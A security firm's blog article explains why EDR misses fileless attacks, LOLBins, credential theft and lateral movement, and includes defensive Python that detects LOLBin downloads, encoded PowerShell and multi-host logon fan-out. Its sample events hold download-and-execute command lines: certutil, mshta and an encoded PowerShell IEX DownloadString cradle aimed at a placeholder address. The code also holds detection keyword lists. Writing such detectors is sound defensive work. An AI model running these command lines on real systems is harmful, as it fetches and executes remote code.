EDR Is Not Enough: Why You Still Need a Penetration Test

Endpoint detection and response (EDR) platforms like CrowdStrike, SentinelOne and Microsoft Defender for Endpoint have inherent blind spots that attackers routinely exploit. Fileless attacks, living-off-the-land binaries, credential-based attacks and lateral movement through legitimate protocols bypass EDR detection. EDR is your immune system. A penetration test is the stress test that reveals what it cannot catch.

The EDR Promise and Its Limits

EDR transformed endpoint security. Instead of static signature matching, modern EDR platforms use behavioral analysis, machine learning and telemetry correlation to detect threats in real time. CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, Carbon Black and Cortex XDR represent billions of dollars in research and engineering.

They are genuinely good at what they do. They catch malware, flag suspicious process chains and provide incident response teams with the telemetry needed to reconstruct attacks. For the threats they are designed to detect, they work.

The problem is the threats they are not designed to detect.

Blind Spot 1: Fileless Attacks

Traditional malware drops an executable to disk, which gives EDR something to scan, hash and analyze. Fileless attacks skip this step entirely. They execute code in memory using legitimate interpreters like PowerShell, WMI, VBScript or .NET reflection. No file is written. No executable appears on the filesystem.

EDR vendors have improved their fileless detection significantly, but the fundamental challenge remains. When malicious code runs inside a legitimate process using legitimate scripting interfaces, the behavioral signals are subtle. An obfuscated PowerShell command that downloads and executes code in memory produces telemetry that can look similar to legitimate administrative automation.

Sophisticated attackers tune their fileless payloads to minimize behavioral indicators. They avoid common patterns that EDR looks for, use legitimate encoding methods instead of suspicious obfuscation and execute in short bursts that limit the time available for behavioral analysis to trigger.

Blind Spot 2: Living-off-the-Land Binaries (LOLBins)

LOLBins are legitimate system tools that can be abused for malicious purposes. Certutil can download files. Mshta can execute scripts. Regsvr32 can load remote code. Rundll32 can execute arbitrary DLLs. Bitsadmin can download payloads. These are Microsoft-signed binaries that ship with every Windows installation.

EDR faces a fundamental dilemma with LOLBins. These tools are used legitimately by system administrators, software installers and management platforms every day. Blocking them breaks legitimate operations. Alerting on every use generates overwhelming noise. The result is that EDR vendors must set detection thresholds that inevitably allow some malicious use to pass through.

Attackers know exactly where these thresholds are. They test their techniques against the major EDR platforms before deploying them in real attacks. If certutil is flagged when used with certain command-line arguments, they use different arguments that achieve the same result. The cat-and-mouse game never ends, and the attacker has the advantage of choosing when and how to engage.
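As an added illustration of the threshold problem described in the two sections above (this is example code written for this page, not code from the original article or from Sherlock Forensics), the following Python applies two process-creation rules to constructed Sysmon-style events: a LOLBin rule that fires only when one of the binaries named above is given a URL on its command line, and an encoded-PowerShell rule that decodes the base64 payload before scoring it. The hosts, command lines and TEST-NET-3 addresses are constructed sample data, and the rule names, keyword list and severity levels are this example's own choices rather than any vendor's.

```python
import base64
import json
import re
from typing import Dict, List

# LOLBins named in the article. The rule fires only when one of them is handed
# a URL, so routine uses (certutil -verify, regsvr32 of a local DLL) stay below
# the threshold; that is exactly the gap the article describes.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob (this example's own pattern).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Decoded content that indicates in-memory download-and-execute behaviour.
SUSPICIOUS_PS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|frombase64string|reflection\.assembly",
    re.IGNORECASE)


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; returns '' when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the rules need), serialised as JSON lines like a collector would ship.
SYS32 = r"C:\Windows\System32"
PS_EXE = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
_EVENTS = [
    {"host": "ws01", "image": SYS32 + r"\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\corp-root.cer"},            # legitimate
    {"host": "ws01", "image": SYS32 + r"\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.10/p.txt C:\Users\Public\p.txt"},
    {"host": "ws02", "image": SYS32 + r"\mshta.exe",
     "cmdline": "mshta http://203.0.113.10/a.hta"},
    {"host": "ws03", "image": PS_EXE,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},  # legitimate
    {"host": "ws03", "image": PS_EXE,
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')")},
    {"host": "ws04", "image": PS_EXE,   # encoded, but benign admin automation
     "cmdline": "powershell.exe -enc " + encode_ps("Get-WinEvent -LogName Security -MaxEvents 5")},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _EVENTS)


def evaluate(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Apply both rules to one event; return zero or more alert records."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    alerts: List[Dict[str, str]] = []
    if image in LOLBINS and URL_RE.search(cmd):
        alerts.append({"host": event["host"], "rule": "lolbin_remote_url",
                       "severity": "high", "detail": image})
    if image in ("powershell.exe", "pwsh.exe"):
        match = ENC_RE.search(cmd)
        if match:
            decoded = decode_ps(match.group(1))
            # Encoding alone is ambiguous (admins use it too); only the decoded
            # content separates a download cradle from routine automation.
            suspicious = bool(SUSPICIOUS_PS.search(decoded))
            alerts.append({"host": event["host"], "rule": "encoded_powershell",
                           "severity": "high" if suspicious else "low",
                           "detail": decoded[:60] or "undecodable blob"})
    return alerts


def scan_log(jsonl: str) -> List[Dict[str, str]]:
    """Run evaluate() over every non-empty JSON line."""
    alerts: List[Dict[str, str]] = []
    for line in jsonl.splitlines():
        if line.strip():
            alerts.extend(evaluate(json.loads(line)))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Running it yields four alerts out of six events: the two legitimate uses produce nothing, the benign encoded command is flagged at low severity only because the rule bothered to decode it, and the certutil and mshta events fire solely because a URL was present. Change that argument pattern, as the article notes attackers do, and the LOLBin rule is silent, which is the reason a pentest has to measure the gap rather than assume the rule covers it.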

Blind Spot 3: Credential-Based Attacks

When an attacker steals valid credentials and uses them to log into systems normally, there is nothing for EDR to detect at the endpoint level. The authentication is legitimate. The session is legitimate. The access patterns are legitimate. From the endpoint's perspective, an authorized user is performing authorized actions.

Credential attacks take many forms. Kerberoasting extracts service account password hashes from Active Directory. Pass-the-hash reuses captured NTLM hashes without knowing the actual password. Token manipulation steals authentication tokens from memory. Social engineering or phishing captures credentials directly from users.

Once an attacker has valid credentials, they can access email, file shares, applications and administrative consoles without triggering endpoint-level detection. The attack looks like normal work because, from the endpoint's perspective, it is normal work. The problem is that the person doing the work is not who the system thinks they are.

Blind Spot 4: Lateral Movement Through Legitimate Protocols

After gaining initial access, attackers move laterally through the network to reach higher-value targets. They use the same protocols that legitimate administrators use: SMB for file access, RDP for remote desktop, WinRM for remote management, SSH for Linux systems and DCOM for distributed application communication.

EDR agents monitor the endpoint they are installed on. They have limited visibility into network-level activity between endpoints. When an attacker moves from Workstation A to Server B using RDP with valid credentials, the EDR agent on Server B sees a legitimate RDP session initiated by an authorized account. There is no malware, no exploit, no suspicious process. Just an admin logging in.

Network detection tools like Darktrace and other NDR platforms can provide some visibility into lateral movement, but they face their own limitations with encrypted traffic and traffic that mimics normal patterns.
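To make the per-endpoint blind spot concrete, here is an added example (written for this page, not code from the original article or from Sherlock Forensics) that takes constructed Windows Security 4624 logon events from several hosts and shows the difference between what one host's agent sees and what a central correlation over all hosts sees. The hostnames, accounts, addresses and the ten-minute/three-host fan-out threshold are this example's own constructed values; the allowlist of service accounts is included because without it the rule would fire on every backup run, the same threshold trade-off the article attributes to EDR.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, FrozenSet, List, Tuple

# Constructed Windows Security 4624 (successful logon) events as a central
# collector would receive them. Fields: timestamp, host that logged the event,
# account, logon type (3 = network such as SMB, 10 = RemoteInteractive i.e. RDP),
# source address. Sample data for this example only.
Event = Tuple[str, str, str, int, str]
EVENTS: List[Event] = [
    ("2024-03-01T01:00:10", "SRV-FILE01", "svc-backup", 3, "10.0.9.4"),
    ("2024-03-01T01:01:05", "SRV-DB02", "svc-backup", 3, "10.0.9.4"),
    ("2024-03-01T01:02:00", "SRV-APP03", "svc-backup", 3, "10.0.9.4"),
    ("2024-03-01T01:03:12", "SRV-DC01", "svc-backup", 3, "10.0.9.4"),
    ("2024-03-01T09:00:05", "WS-A", "jdoe", 10, "10.0.5.23"),        # own desktop
    ("2024-03-01T09:41:10", "SRV-FILE01", "jdoe", 3, "10.0.5.23"),   # normal share use
    ("2024-03-01T10:12:44", "SRV-APP03", "mlee", 10, "10.0.5.31"),
    ("2024-03-01T10:15:20", "SRV-FILE01", "mlee", 3, "10.0.5.31"),
    ("2024-03-01T13:02:11", "SRV-DB02", "jdoe", 10, "10.0.5.23"),    # four hosts in
    ("2024-03-01T13:03:40", "SRV-APP03", "jdoe", 10, "10.0.5.23"),   # under five
    ("2024-03-01T13:05:02", "SRV-DC01", "jdoe", 10, "10.0.5.23"),    # minutes, all
    ("2024-03-01T13:06:30", "SRV-BACKUP", "jdoe", 3, "10.0.5.23"),   # valid creds
]
# Accounts whose job is to touch many hosts in a short time (constructed).
BASELINE_ACCOUNTS: FrozenSet[str] = frozenset({"svc-backup"})


def logons_seen_by(events: List[Event], host: str) -> List[Tuple[str, int, str]]:
    """What the agent on a single host sees: each successful logon in isolation."""
    return [(acct, ltype, src) for _, h, acct, ltype, src in events if h == host]


def fan_out_alerts(events: List[Event], window_minutes: int = 10, min_hosts: int = 3,
                   baseline: FrozenSet[str] = BASELINE_ACCOUNTS) -> List[Dict[str, object]]:
    """Cross-host correlation: one account reaching >= min_hosts distinct hosts
    inside a sliding window. Only visible when events from all hosts are pooled."""
    window = timedelta(minutes=window_minutes)
    by_account: Dict[str, List[Tuple[datetime, str, int, str]]] = defaultdict(list)
    for ts, host, account, ltype, src in events:
        if ltype in (3, 10):        # remote logons only; local/console logons ignored
            by_account[account].append((datetime.fromisoformat(ts), host, ltype, src))
    alerts: List[Dict[str, object]] = []
    for account, rows in by_account.items():
        if account in baseline:
            continue
        rows.sort()
        for start, _, _, _ in rows:
            in_window = [r for r in rows if start <= r[0] <= start + window]
            hosts = {r[1] for r in in_window}
            if len(hosts) >= min_hosts:
                alerts.append({"account": account, "window_start": start.isoformat(),
                               "hosts": sorted(hosts),
                               "sources": sorted({r[3] for r in in_window})})
                break               # one alert per account per run is enough
    return alerts


if __name__ == "__main__":
    print("SRV-DB02 alone sees:", logons_seen_by(EVENTS, "SRV-DB02"))
    print("central correlation sees:", fan_out_alerts(EVENTS))
```

From SRV-DB02's point of view, jdoe's 13:02 RDP session is a single valid logon with nothing to flag, exactly the situation the section above describes. Pooling the 4624 events from all hosts exposes the four-host fan-out in under five minutes, and dropping the allowlist shows the cost: the backup account trips the same rule every night, which is why such a control has to be tuned against the real environment rather than assumed to work.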

EDR Is Your Immune System. A Pentest Is the Stress Test.

This analogy captures the relationship precisely. Your immune system runs continuously, catching threats automatically and responding to infections in real time. It is essential. You would not survive without it.

But your immune system does not tell you about the threats it cannot detect. Autoimmune conditions, cancer cells that evade immune recognition, dormant infections that hide below the immune response threshold. You need diagnostic tests, screenings and external examination to find what the immune system misses.

A penetration test is that diagnostic examination for your security infrastructure. It does not replace EDR. It tests EDR. It reveals the specific gaps in your specific deployment. It tells you not just that gaps exist in theory, but exactly where they are in your environment and exactly what an attacker could achieve by exploiting them.

What a Pentest Reveals That EDR Cannot

When we conduct a penetration test against an environment with EDR deployed, we document three things:

What EDR detected. This validates that your EDR deployment is working correctly for the threats it is designed to catch. If your EDR misses techniques it should detect, that indicates a configuration or deployment issue that needs immediate attention.

What EDR missed. These are the techniques that successfully bypassed detection. They represent the real gaps in your endpoint security posture. Each missed technique is a pathway that a real attacker could exploit.

What EDR could not possibly detect. Credential-based attacks, trust architecture gaps, network-level issues and configuration weaknesses that exist outside EDR's monitoring scope. These findings require compensating controls beyond endpoint detection.

This three-part analysis gives security teams a complete picture. Not just what EDR catches, but what it misses and why. That information drives investment decisions about compensating controls, detection engineering and architectural improvements.

The Bottom Line

EDR is necessary. It is not sufficient. If your security strategy assumes that EDR catches everything, you have a blind spot the size of every technique in this article. The only way to quantify that blind spot is to test it.

At Sherlock Forensics, every network penetration test includes EDR evasion testing as a standard component. We do not test in a lab. We test against your actual deployment, with your actual configuration, in your actual environment. The result is proof, not theory.

Test Your EDR Coverage